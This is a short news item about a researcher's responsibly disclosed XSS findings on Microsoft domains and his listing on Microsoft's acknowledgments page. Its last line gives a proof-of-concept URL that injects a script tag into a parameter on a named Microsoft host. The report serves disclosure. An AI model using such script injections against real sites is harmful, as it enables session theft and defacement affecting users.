"Well last month I was looking around on MSN.com and Microsoft.com I found two XSS vulnerabilities, one in each domain. I reported the vulnerabilities to the Microsoft security team and secured a spot on their acknowledgments page."Gambit said in his blog.
Microsoft listed his name in the 'Security Researcher Acknowledgments for Microsoft Online Services' page.
'asia.perf.glbdns.microsoft.com' page is vulnerable to XSS. Researcher managed to execute the XSS code in the page.
POC: "asia.perf.glbdns.microsoft.com/files/top.php?domain=<script>alert(/Gambit/)</script>"
